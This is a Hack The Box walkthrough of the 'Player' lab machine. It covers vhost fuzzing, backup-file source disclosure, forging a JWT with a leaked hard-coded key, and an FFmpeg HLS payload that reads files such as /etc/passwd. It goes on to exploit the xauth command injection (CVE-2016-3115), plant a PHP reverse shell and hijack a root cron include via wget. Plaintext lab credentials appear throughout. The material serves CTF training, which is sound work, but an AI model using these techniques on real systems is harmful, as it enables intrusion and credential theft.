[HTB] Player Walkthrough

Hi guys, here is my writeup for the Player machine. It is quite hard and really good. Its IP is 10.10.10.145; put it in /etc/hosts as player.htb and jump in.

Nmap scan






We have the machine's ports, so let's explore the HTTP service. Opening its page in a browser only gives a 403 Forbidden.





Nothing to check there, so I fuzzed paths with wfuzz. That turned up only one directory, /launcher; note it and set it aside for now. Fuzzing virtual hosts with wfuzz (the FUZZ keyword goes in the Host header) then returned three subdomains.
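How vhost fuzzing finds those three names, as an added example that is not tooling from the walkthrough: it mirrors what `wfuzz -w <wordlist> -H "Host: FUZZ.player.htb" --hh <baseline size> http://10.10.10.145/` does, namely request a host that cannot exist to learn the "no such vhost" response and report every candidate that answers differently. The HTTP client is injected, so the code runs offline against the constructed FAKE_RESPONSES table below (the sizes are made up); pass a real client to use it on a target.

```python
"""Virtual-host discovery by comparing each candidate Host header against a
baseline response. Added example; the send() function is injectable so the
logic can run offline against constructed data."""
import random
import string
from typing import Callable, Dict, List, Tuple

Response = Tuple[int, int]  # (HTTP status, body length)

# Constructed data imitating the box: unknown hosts get the 403 default page,
# the three vhosts the walkthrough found answer with real content.
FAKE_RESPONSES: Dict[str, Response] = {
    "dev.player.htb": (200, 10213),
    "staging.player.htb": (200, 3571),
    "chat.player.htb": (200, 4492),
}
DEFAULT_RESPONSE: Response = (403, 286)


def fake_send(host: str) -> Response:
    """Stand-in for GET / on 10.10.10.145 with the given Host header."""
    return FAKE_RESPONSES.get(host, DEFAULT_RESPONSE)


def baseline(send: Callable[[str], Response], domain: str) -> Response:
    """Ask for a host that cannot exist to learn what 'no such vhost' looks like."""
    junk = "".join(random.choices(string.ascii_lowercase, k=12))
    return send(f"{junk}.{domain}")


def find_vhosts(send: Callable[[str], Response], domain: str,
                words: List[str]) -> List[str]:
    """Return every candidate whose (status, size) differs from the baseline,
    which is what wfuzz's --hh filter leaves on screen."""
    base = baseline(send, domain)
    hits = []
    for word in words:
        host = f"{word}.{domain}"
        if send(host) != base:
            hits.append(host)
    return hits


if __name__ == "__main__":
    for host in find_vhosts(fake_send, "player.htb",
                            ["www", "dev", "staging", "chat", "admin", "mail"]):
        print(host)
```

Real servers often vary the default page slightly between requests (dates, nonces), so in practice you compare on status plus line or word count (wfuzz --hl/--hw) rather than on an exact byte length.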





Put them into /etc/hosts and check them.

dev.player.htb






staging.player.htb






chat.player.htb






Not much here, except on staging.player.htb: sending a request for the staging vhost through Burp produces an error page, and the error exposes a path under /var/www/staging.





Note it and leave it. Back on player.htb, request the /launcher path.





When the page loads, the browser sends a GET to something interesting:
/launcher/dee8dc8a47256c64630d803a4c40786e.php
Entering an email address in the form hits a second one:
/launcher/dee8dc8a47256c64630d803a4c40786c.php
A few test requests to it all came back as 302 Found, which matches what the browser shows.





The chat vhost mentions exposed source code, which prompted me to read up on source-code disclosure. It happens when a backup copy or an editor's temporary file is left next to the live script (emacs and some other editors keep `file~`; vim leaves `.file.swp`); Apache then serves that copy as plain text because its extension no longer matches the PHP handler. Appending ~ to /launcher/dee8dc8a47256c64630d803a4c40786c.php and sending the request in Burp returns the page's source.
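A small probe for this class of leftover, as an added example rather than code from the walkthrough: candidates() derives the usual backup and editor names from the script's own name, and probe() keeps only responses that are really unexecuted source (a 200 whose body still carries the PHP open tag), because a sloppy handler regex such as `\.php` without a `$` anchor will execute `.php.bak` and just redirect. The fetch function is injected, so the code runs offline against the constructed FAKE_PAGES table; give it a real HTTP client to use it on a target.

```python
"""Source-disclosure probe for editor and backup leftovers. Added example;
fetch() is injectable so the logic runs offline against constructed pages."""
from typing import Callable, Dict, List, Tuple
from urllib.parse import quote, urlsplit, urlunsplit

# Names that editors, admins and deploy scripts leave beside a live script.
SUFFIXES = ["~", ".bak", ".old", ".orig", ".save", ".swp", ".txt", ".1"]

TARGET = "http://player.htb/launcher/dee8dc8a47256c64630d803a4c40786c.php"

# Constructed responses: the emacs-style backup leaks source, the .bak copy is
# still executed by a sloppy handler pattern and only redirects, the rest 404.
FAKE_PAGES: Dict[str, Tuple[int, bytes]] = {
    TARGET + "~": (200, b"<?php\nrequire 'vendor/autoload.php';\nuse \\Firebase\\JWT\\JWT;\n"),
    TARGET + ".bak": (302, b""),
}


def fake_fetch(url: str) -> Tuple[int, bytes]:
    """Stand-in for an HTTP GET returning (status, body)."""
    return FAKE_PAGES.get(url, (404, b"Not Found"))


def candidates(url: str) -> List[str]:
    """Backup/leftover URLs derived from the script's own name."""
    parts = urlsplit(url)
    directory, _, name = parts.path.rpartition("/")
    names = [name + s for s in SUFFIXES] + [f".{name}.swp", f"#{name}#"]
    return [urlunsplit(parts._replace(path=f"{directory}/{quote(n)}"))
            for n in names]


def probe(fetch: Callable[[str], Tuple[int, bytes]], url: str) -> List[Tuple[str, bytes]]:
    """Keep only hits that are unexecuted source: a 200 whose body still
    contains the PHP open tag. A 200 or 302 without it was executed server-side."""
    found = []
    for cand in candidates(url):
        status, body = fetch(cand)
        if status == 200 and b"<?php" in body:
            found.append((cand, body))
    return found


if __name__ == "__main__":
    for hit, body in probe(fake_fetch, TARGET):
        print(hit, body.splitlines()[0])
```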





dee8dc8a47256c64630d803a4c40786c.php

<?php
require 'vendor/autoload.php';
use \Firebase\JWT\JWT;

if (isset($_COOKIE["access"]))
{
    // Returning visitor: verify the cookie and compare its claim with the privileged code.
    $key = '_S0_R@nd0m_P@ss_';
    $decoded = JWT::decode($_COOKIE["access"], base64_decode(strtr($key, '-_', '+/')), ['HS256']);
    if ($decoded->access_code === "0E76658526655756207688271159624026011393")
    {
        header("Location: 7F2xxxxxxxxxxxxx/");
    }
    else
    {
        header("Location: index.html");
    }
}
else
{
    // First visit: issue a token carrying the unprivileged access code.
    $token_payload = [
        'project' => 'PlayBuff',
        'access_code' => 'C0B137FE2D792459F26FF763CCE44574A5B5AB03'
    ];
    $key = '_S0_R@nd0m_P@ss_';
    $jwt = JWT::encode($token_payload, base64_decode(strtr($key, '-_', '+/')), 'HS256');
    $cookiename = 'access';
    setcookie('access', $jwt, time() + (86400 * 30), "/");
    header("Location: index.html");
}
?>
The code tells us two things: access is controlled by a JSON Web Token in the access cookie, and the HMAC secret is hard-coded in the script, so we can generate a token with the privileged access_code ourselves. Note that JWT::decode is called with an explicit ['HS256'] allow-list, so the alg=none trick is not an option here; the leaked key is the way in.
Paste the cookie into jwt.io to decode it.





The decoded token carries access_code C0B137FE2D792459F26FF763CCE44574A5B5AB03, the unprivileged default every visitor gets.
To craft a token with more privilege, change the access code to the value the check expects, enter the key from the source as the secret and tick "secret base64 encoded", because the PHP passes base64_decode(strtr($key, '-_', '+/')) to the JWT library rather than the raw string.
From the PHP source the key is _S0_R@nd0m_P@ss_ and the expected access code is 0E76658526655756207688271159624026011393.
With these two we generate a token to use in our GET request.





New Access Key:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJwcm9qZWN0IjoiUGxheUJ1ZmYiLCJhY2Nlc3NfY29kZSI6IjBFNzY2NTg1MjY2NTU3NTYyMDc2ODgyNzExNTk2MjQwMjYwMTEzOTMifQ.VXuTKqw__J4YgcgtOdNDgsLgrFjhN1_WwspYNf_FjyE
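The same forgery done by hand, as an added example (the walkthrough used jwt.io, and this is not code from the page or from php-jwt): it reproduces what firebase/php-jwt computes for these inputs instead of calling a JWT library, so the header and payload segments can be compared with the token above. php_key_bytes() emulates PHP's non-strict base64_decode, which silently drops characters outside the base64 alphabet (the two '@' here); that emulation is an assumption, and whether the signature byte-matches the one above depends on how jwt.io decoded the secret. The server only cares that the HMAC was made with the bytes PHP itself derives, which is what this does. decode() verifies the way the server does, including the HS256 allow-list.

```python
"""Forge the PlayBuff `access` cookie with the hard-coded secret from the
leaked PHP. Added example; php_key_bytes() assumes PHP's non-strict
base64_decode semantics."""
import base64
import hashlib
import hmac
import json
import re

PHP_KEY = "_S0_R@nd0m_P@ss_"                                   # literal from the source
PRIVILEGED_CODE = "0E76658526655756207688271159624026011393"   # what the === check wants
DEFAULT_CODE = "C0B137FE2D792459F26FF763CCE44574A5B5AB03"      # what visitors get


def php_key_bytes(key: str) -> bytes:
    """Mirror base64_decode(strtr($key, '-_', '+/')). Assumption: PHP's
    non-strict decoder ignores characters outside the alphabet, e.g. '@'."""
    translated = key.translate(str.maketrans("-_", "+/"))
    cleaned = re.sub(r"[^A-Za-z0-9+/]", "", translated)
    if len(cleaned) % 4 == 1:
        raise ValueError("PHP would reject a single trailing base64 character")
    return base64.b64decode(cleaned + "=" * (-len(cleaned) % 4))


def b64url(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def encode(payload: dict, key: bytes) -> str:
    """JWT::encode($payload, $key, 'HS256'); php-jwt emits the header keys in
    the order typ, alg, which is why the first segment matches the token above."""
    header = {"typ": "JWT", "alg": "HS256"}
    segments = [b64url(json.dumps(header, separators=(",", ":")).encode()),
                b64url(json.dumps(payload, separators=(",", ":")).encode())]
    signing_input = ".".join(segments).encode()
    signature = hmac.new(key, signing_input, hashlib.sha256).digest()
    return ".".join(segments + [b64url(signature)])


def decode(token: str, key: bytes) -> dict:
    """Verify like JWT::decode($jwt, $key, ['HS256']): the allow-list rejects an
    alg=none token, so only a token signed with the real key is accepted."""
    head, body, sig = token.split(".")
    if json.loads(b64url_decode(head)).get("alg") != "HS256":
        raise ValueError("algorithm not allowed")
    expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(b64url(expected), sig):
        raise ValueError("signature mismatch")
    return json.loads(b64url_decode(body))


def forge_access_cookie(access_code: str = PRIVILEGED_CODE) -> str:
    payload = {"project": "PlayBuff", "access_code": access_code}
    return encode(payload, php_key_bytes(PHP_KEY))


if __name__ == "__main__":
    token = forge_access_cookie()
    print(f"Cookie: access={token}")
    print(decode(token, php_key_bytes(PHP_KEY)))
```

Send the printed value as the access cookie on the GET to /launcher/dee8dc8a47256c64630d803a4c40786c.php and the redirect target changes from index.html to the hidden directory.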
Sending the GET request in Burp with the forged cookie, we get a 302 that points at a new location:





HTTP/1.1 302 Found
Date: Fri, 11 Oct 2019 21:27:17 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.26
Location: 7F2dcsSdZo6nj3SNMTQ1/
Content-Length: 0
Connection: close
Content-Type: text/html
Browsing to that location, http://player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/, shows a page that lets us upload files.





It says it will compress and secure our media.
A test upload of a .jpg came back as an .avi, so the backend is converting uploads with FFmpeg, and that suggests an FFmpeg payload. The FFmpeg HLS vulnerability fits: an AVI crafted to carry an HLS (.m3u8) playlist makes FFmpeg follow the playlist's local file:// references while converting, and the referenced file's text ends up rendered in the output video, which turns the converter into an arbitrary file read. swisskyrepo's PayloadsAllTheThings has a generator for this and was really helpful: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS.
With that script I generated passwd.avi and uploaded it to the site:
python3 gen_xbin_avi.py file:///etc/passwd passwd.avi
After "compressing and securing" it, the site offered the AVI for download.
Playing it shows the contents of /etc/passwd from player.htb.





python3 gen_avi.py file:///etc/passwd passwd.av​i





From the initial enumeration there are two files we want to read: service_config and fix.php.
python3 gen_avi.py file:///var/www/backup/service_config service_config.avi





username = 'telegen',
password = 'd-bC|jC!2uepS/w'
Now we have a credential. It does not work for SSH on port 22, but it does on port 6686, the other SSH service from the scan. That login only lands in a restricted shell with almost no usable commands, so there is no flag to be had there directly. Googling the OpenSSH version on that port turned up a CVE with a public exploit script; its transcript below (the .readfile command works by injecting an xauth "source" line) identifies it as the xauth command injection, CVE-2016-3115. With that script we get command injection and can read the user flag.





Now that we can read files, let's also check /var/www/staging/fix.php, the path staging.player.htb exposed earlier.
#> .readfile /var/www/staging/fix.php
DEBUG:__main__:auth_cookie: 'xxxx\nsource /var/www/staging/fix.php\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:<?php
class ...
[The class body, a small test helper with passed/failed counters, did not survive extraction; only the first word of each line is left, so it is omitted here. The one intact part is a comment block inside the method that sets default $username/$password values:]
        //modified
        //for
        //fix
        //peter
        //CQXpm\z)G5D#%S$y=
Look carefully and we get another credential; note it for later:
peter:CQXpm\z)G5D#%S$y=
Back to enumeration, this time to escalate to root. We already know the machine has vhosts, so let's read the Apache config for their document roots; it usually lives at /etc/apache2/sites-available/000-default.conf. Make the payload and upload it.
python3 gen_avi.py file:///etc/apache2/sites-available/000-default.conf apache.avi





Now we know dev.player.htb's document root is /var/www/demo, so let's explore it:
python3 gen_avi.py file:///var/www/demo/index.php devindex.avi





That gives us credentials, and we already know the dev.player.htb path, so let's log in. After logging in the site looks like this:





After playing with it a bit, I created a new project named pis with the absolute path /var/www/demo/shell. The application only allows project paths under /var/www/demo or /var/www/demo/home, so staying inside that I could create the project and upload my shell.





Start an nc listener and wait for the connection from the box. To trigger the shell, browse to dev.player.htb/your_project/your_shell.php; the connection comes back as www-data.





As usual I went through the standard privilege-escalation checks and also ran pspy64 to watch processes on the box. The pspy64 output shows an interesting one:
2020/01/05 11:47:02 CMD: UID=0    PID=30530  | /bin/sh -c /usr/bin/php /var/lib/playbuff/buff.php > /var/lib/playbuff/error.log
It runs as root, so let's see what /var/lib/playbuff/buff.php does.





On its second line it includes another PHP file from /var/www/html/launcher:
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");
Check the permissions of that file:
www-data@player:/var/lib/playbuff$ ls -la /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
-rw-r--r-- 1 www-data www-data 286 Mar 25  2019 /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
It is owned by www-data, so we can overwrite it. I created a file with the same name locally containing PHP that spawns a reverse shell, replaced the original with wget, and waited for the root job to run again; the next run connects back as root.
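The condition behind this escalation, root executing a script that include()s a file the web user owns, is worth checking systematically rather than by eye. The check below is an added example, not code from the walkthrough: it pulls literal include/require paths out of a PHP file and reports the ones the current user could write, or could create because the directory is writable. build_fixture() lays out a constructed copy of the situation in a temporary directory so the check runs offline; on the box you would run writable_includes("/var/lib/playbuff/buff.php") as www-data. Dynamic includes and PHP's include_path are not resolved, which is an assumption of the check.

```python
"""Report includes of a (root-run) PHP script that the current user can
tamper with. Added example; build_fixture() creates constructed test files."""
import os
import re
import tempfile
from typing import List, Tuple

# Literal include/require/_once paths only (assumption: the interesting ones are literal).
INCLUDE_RE = re.compile(r"""\b(?:include|require)(?:_once)?\s*\(?\s*['"]([^'"]+)['"]""")


def included_files(php_path: str) -> List[str]:
    """Paths pulled in by the script. Relative paths are resolved against the
    script's own directory; PHP's include_path is ignored here (assumption)."""
    with open(php_path, encoding="utf-8", errors="replace") as fh:
        source = fh.read()
    base = os.path.dirname(os.path.abspath(php_path))
    return [p if os.path.isabs(p) else os.path.join(base, p)
            for p in INCLUDE_RE.findall(source)]


def writable_includes(php_path: str) -> List[Tuple[str, str]]:
    """(path, reason) for each include this user could tamper with: the file is
    writable, or it is missing and its directory is, so it could be planted."""
    findings = []
    for path in included_files(php_path):
        if os.path.exists(path):
            if os.access(path, os.W_OK):
                findings.append((path, "writable file"))
        elif os.access(os.path.dirname(path), os.W_OK):
            findings.append((path, "missing, directory writable"))
    return findings


def build_fixture() -> Tuple[str, str]:
    """Constructed layout mirroring the box: buff.php (run by root) includes a
    launcher file that belongs to the web user. Returns (buff.php, included)."""
    root = tempfile.mkdtemp(prefix="playbuff-")
    launcher = os.path.join(root, "launcher")
    os.makedirs(launcher)
    included = os.path.join(launcher, "dee8dc8a47256c64630d803a4c40786g.php")
    with open(included, "w") as fh:
        fh.write("<?php\n// stand-in for the real include\n")
    os.chmod(included, 0o644)      # rw-r--r-- as on the box; the owner can still write
    buff = os.path.join(root, "buff.php")
    with open(buff, "w") as fh:
        fh.write(f'<?php\ninclude("{included}");\nrequire_once "vendor/autoload.php";\n')
    return buff, included


if __name__ == "__main__":
    buff, _ = build_fixture()
    for path, reason in writable_includes(buff):
        print(f"{path}: {reason}")
```

The fix on the defending side is the mirror image: a script run by root must only include files that root owns and that are not writable by the web user, so chown root:root and a 644 mode on the launcher file (or not including web-root code from a root job at all) closes this path.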





This is a really good box. Let me know how you 'hacked' it and what you thought of it. Thanks for reading!
About PiS

Captain running team to research about hacking,network,security and cyber field